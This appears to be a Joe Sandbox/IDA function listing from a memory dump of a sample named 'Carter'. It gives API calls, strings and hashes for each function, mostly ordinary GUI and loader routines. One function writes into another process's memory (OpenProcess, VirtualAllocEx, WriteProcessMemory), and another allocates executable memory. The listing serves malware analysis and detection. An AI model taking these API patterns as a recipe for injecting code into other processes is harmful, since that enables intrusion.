Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 84e1d8c66d59d2878cd79c3ca71e795440e9e702892adbb3d7db7e67eb0623a1
Instruction ID: 414e40723b86b38555ed2eb19cabca4ee6ad03d222ff528cd6ed4a990bed5fe4
Opcode Fuzzy Hash: 84e1d8c66d59d2878cd79c3ca71e795440e9e702892adbb3d7db7e67eb0623a1
Instruction Fuzzy Hash: 25515C72E09601C7CB11B718E9413EE6B909B81750F70895AE4F1869FBEE748DC4BB46

Function 00C10654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00C10690
#, xrefs: 00C10699

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 993eeaee9995e1157a67987e3af144da123377b88ecb775239dc0d0df4c1e25c
Instruction ID: ce8a1ed86900e2b70ed0d185345d28bb53fa71a50781990521ee20c0975c18ee
Opcode Fuzzy Hash: 993eeaee9995e1157a67987e3af144da123377b88ecb775239dc0d0df4c1e25c
Instruction Fuzzy Hash: FE510175504245CFDB159F68C880AFA7BA0FF5B310F284055FCA1AB2D0D730AE82DBA2

Function 00C0CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C0CFC2
_memmove.LIBCMT ref: 00C0D060
_memset.LIBCMT ref: 00C0D084

Strings

ERCP, xrefs: 00C0CF2D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: c520dfde7ca40c65e4b5a29183c612e4e6e3d164224caea6b35d8fac494885d9
Instruction ID: 31d77d77852eec70eeaeb8acb8c8a82ef94ee11d3e3a999d5efecb311fa9770a
Opcode Fuzzy Hash: c520dfde7ca40c65e4b5a29183c612e4e6e3d164224caea6b35d8fac494885d9
Instruction Fuzzy Hash: B551C5B1A0070A9BDB24CFA5C8857EABBF4FF04314F14856EE95ADB290E770D685CB40

Function 00C4A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C51CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C49E4E,?,?,00000034,00000800,?,00000034), ref: 00C51CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C4A3F7

Part of subcall function 00C51C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C49E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00C51CB0

Part of subcall function 00C51BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00C51C08
Part of subcall function 00C51BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C49E12,00000034,?,?,00001004,00000000,00000000), ref: 00C51C18
Part of subcall function 00C51BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C49E12,00000034,?,?,00001004,00000000,00000000), ref: 00C51C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C4A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C4A4B1

Strings

@, xrefs: 00C4A4C9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: e4b49948354b32088c263af3359d9009bebd8cfbca3a89225539865ecddd54cc
Instruction ID: 1cee09f39fa1330e0d240a9fa7ee9e63f89b09a192d381c3f931c1e5ae11648f
Opcode Fuzzy Hash: e4b49948354b32088c263af3359d9009bebd8cfbca3a89225539865ecddd54cc
Instruction Fuzzy Hash: BC415876940218BFCB10DBA4CC85BDEBBB8EF09300F044095FA55A7180DA716F89DBA1

Function 00C779FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C77A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C77A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C77ABE

Strings

SysMonthCal32, xrefs: 00C77A51

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 66571a17666f74fa9ad79df1921bc5c68571a9c5a72ab91af56e88b10a811d68
Instruction ID: 8d5db9e59f0e35b0e3f8c77af05bab981f27393aa52ed8c40b76253410c6aa1a
Opcode Fuzzy Hash: 66571a17666f74fa9ad79df1921bc5c68571a9c5a72ab91af56e88b10a811d68
Instruction Fuzzy Hash: 6221913264021DABEF118F54CC46FEE3B69EF48724F115214FE196B190DA71A9549B90

Function 00C781B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C7826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C7827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C78284

Strings

msctls_updown32, xrefs: 00C781E9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 06782ceac033246595628df03a158e078c83f086873ea042b425fc1d6a7c03e8
Instruction ID: 35f9d0fbfbaf21ed946c3cb434abe5324774c39920713d01c47bf2bfb56f17c7
Opcode Fuzzy Hash: 06782ceac033246595628df03a158e078c83f086873ea042b425fc1d6a7c03e8
Instruction Fuzzy Hash: AE21B2B1604209AFDB00DF54CCC5EAB37EDEF4A354B444159FA14AB292CB31EC15CBA0

Function 00C772D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C77360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C77370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C77395

Strings

Listbox, xrefs: 00C7732D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 986b4534c6a32722d3af972b89e5c8fffe664ddae5a19f604ed54a9a44cf452b
Instruction ID: 5bd797fe14f24fb21de2979a0526fd9d1a7dc387ebb37246a79b844f0c5a8260
Opcode Fuzzy Hash: 986b4534c6a32722d3af972b89e5c8fffe664ddae5a19f604ed54a9a44cf452b
Instruction Fuzzy Hash: DE218032614118BFDF128F55CC85FBF37AAEB89754F11C224FD289B1A0DA71AC519BA0

Function 00C6C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C3027A,?), ref: 00C6C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6C6F9

Strings

GetSystemWow64DirectoryW, xrefs: 00C6C6F3
kernel32.dll, xrefs: 00C6C6E2

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: aa797a2c150123857e4708b02a371c41dd92240e4dca4fc6355b753d312a137d
Instruction ID: 8d3c443c840d9fb3f27301c5f7f3985e1a9da168d3b9e068e817f5fe6ab7e155
Opcode Fuzzy Hash: aa797a2c150123857e4708b02a371c41dd92240e4dca4fc6355b753d312a137d
Instruction Fuzzy Hash: DFE0ECB96107138FD7705B25DCCDB6A76E4AB04759FA08429E8E5D2650D770DC448B14

Function 00C04BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C04AF7,?), ref: 00C04BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C04BCA

Strings

Wow64RevertWow64FsRedirection, xrefs: 00C04BC4
kernel32.dll, xrefs: 00C04BB3

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: bd34ad25c576c49997f9a2128cee5c29344bc9a6326e54b87d2d170fc97c1944
Instruction ID: ec29522272185ae5e2aed1fdaee1c971f51d630465716fdf4b6da722f7a4ce8b
Opcode Fuzzy Hash: bd34ad25c576c49997f9a2128cee5c29344bc9a6326e54b87d2d170fc97c1944
Instruction Fuzzy Hash: 16D0C7B0400B138FDB209F30DC08B0B72E4AF00360F208CBAD892C2590EA70E980CB00

Function 00C04B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C04B44,?,00C049D4,?,?,00C027AF,?,00000001), ref: 00C04B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C04B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 00C04B91
kernel32.dll, xrefs: 00C04B80

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 0e5585068a14ee479703486ed25b25517cb68a97c82ecbb1efde8cfb4e6514b3
Instruction ID: 8e3377cf5f9f10f1c721455a86c2de75ec423299a2e02f32e7a7244a26d4abdb
Opcode Fuzzy Hash: 0e5585068a14ee479703486ed25b25517cb68a97c82ecbb1efde8cfb4e6514b3
Instruction Fuzzy Hash: 24D017B1510B128FD720AF71DC19B0A76E4AF05765F61883AD496E2590E670E884CB18

Function 00C71447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00C71696), ref: 00C71455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C71467

Strings

advapi32.dll, xrefs: 00C71450
RegDeleteKeyExW, xrefs: 00C71461

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 1476bf509343fc3d5869babd372d3411aab8ad70aeb210f2eab11e2ad9f11093
Instruction ID: df762ffb7c458af6230582af8e7188d7fd75c59644d3c4741426f7acf0b504e8
Opcode Fuzzy Hash: 1476bf509343fc3d5869babd372d3411aab8ad70aeb210f2eab11e2ad9f11093
Instruction Fuzzy Hash: DAD017315107138FD7209F79CC4D70A76E4AF067A9F25C83A98EAD2560EA70E8C0CB54

Function 00C055F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C05E3D), ref: 00C055FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C05610

Strings

GetNativeSystemInfo, xrefs: 00C0560A
kernel32.dll, xrefs: 00C055F9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 88c86cbaf0ad18485be3f5fe42ac3481886366ac6156cf038166365a841ec446
Instruction ID: 9ec6d3d6a2cc4c0789c880a3965e7d692b31dbddcb2737e8bd985d9dc8d573c2
Opcode Fuzzy Hash: 88c86cbaf0ad18485be3f5fe42ac3481886366ac6156cf038166365a841ec446
Instruction Fuzzy Hash: BFD0C734820F128FE360AF30C80830B76E4AF00B69F26883AE492C2290E670D884CB48

Function 00C697CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C693DE,?,00C80980), ref: 00C697D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C697EA

Strings

kernel32.dll, xrefs: 00C697D3
GetModuleHandleExW, xrefs: 00C697E4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 5f0e878b0c5d2da8d51218e5eb44672b65939cd1c54dcefbeb4c4deaf64bb41d
Instruction ID: 837905f3139a15928576a85920cd6fc95235adad3e1e5982b7424d2da96ba982
Opcode Fuzzy Hash: 5f0e878b0c5d2da8d51218e5eb44672b65939cd1c54dcefbeb4c4deaf64bb41d
Instruction Fuzzy Hash: B7D01771520B138FD730AF31D88970AB6E8EF057A5F21883AD496E2150EB70D984CB12

Function 00C47D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9911cdc8846fcad52e4daa23b47a25d3813aa85d21a87e19c4932d3c12f3be12
Instruction ID: eec6c77fca0c1287fee32209b38de57a353ed31bb0f565d2e25cfc75c7f60698
Opcode Fuzzy Hash: 9911cdc8846fcad52e4daa23b47a25d3813aa85d21a87e19c4932d3c12f3be12
Instruction Fuzzy Hash: 2AC18074A10216EFDB14CFA4C884EAEBBF5FF48710B118698E815DB251DB31EE85CB90

Function 00C6E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C6E7A7
CharLowerBuffW.USER32(?,?), ref: 00C6E7EA

Part of subcall function 00C6DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C6DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C6E9EA
_memmove.LIBCMT ref: 00C6E9FD

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: be7c2d84f54012cc1c579a46e80ae24eab319d7c523fa1bd87c3556ef6d7b8d8
Instruction ID: 6793d18d85a69992596c5664751ef3c2aaa7a03514bf1154ed7e117ea7c893d0
Opcode Fuzzy Hash: be7c2d84f54012cc1c579a46e80ae24eab319d7c523fa1bd87c3556ef6d7b8d8
Instruction Fuzzy Hash: 70C15975A083019FC724DF28C48096ABBE4FF89714F14896EF8999B351D731EA46CF82

Function 00C6877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C687AD
CoUninitialize.OLE32 ref: 00C687B8

Part of subcall function 00C7DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00C68A0E,?,00000000), ref: 00C7DF71

VariantInit.OLEAUT32(?), ref: 00C687C3
VariantClear.OLEAUT32(?), ref: 00C68A94

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: a5f7d9638260406dea3b085563bf72e02fe2397706aae0d9a7b5d102ed19f168
Instruction ID: 690e6b8eb8ba1a69109fb2651ed149fd29fbdf6d2846b800c079fc203f6ca53f
Opcode Fuzzy Hash: a5f7d9638260406dea3b085563bf72e02fe2397706aae0d9a7b5d102ed19f168
Instruction Fuzzy Hash: 08A16C752047059FD720DF64C481B2AB7E4BF88314F148999FA959B3A2CB30ED49DB92

Function 00C4814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C83C4C,?), ref: 00C48308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C83C4C,?), ref: 00C48320
CLSIDFromProgID.OLE32(?,?,00000000,00C80988,000000FF,?,00000000,00000800,00000000,?,00C83C4C,?), ref: 00C48345
_memcmp.LIBCMT ref: 00C48366

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 073c1895aa7d0a2ac2ffae60fdccf2d9d33686e7ce30401c608adf5d61696dde
Instruction ID: 81e7d283f6a7745dc7d62787eb6ac7782183265f8f281675f77b48d5bb579fcd
Opcode Fuzzy Hash: 073c1895aa7d0a2ac2ffae60fdccf2d9d33686e7ce30401c608adf5d61696dde
Instruction Fuzzy Hash: 82813B71A00109EFCB04DFD4C888EEEB7B9FF89715F244558E516AB250DB71AE4ACB60

Function 00C4749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C474AC
SysAllocString.OLEAUT32(00000000), ref: 00C47555
VariantCopy.OLEAUT32 ref: 00C47584
VariantClear.OLEAUT32(?), ref: 00C475AB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
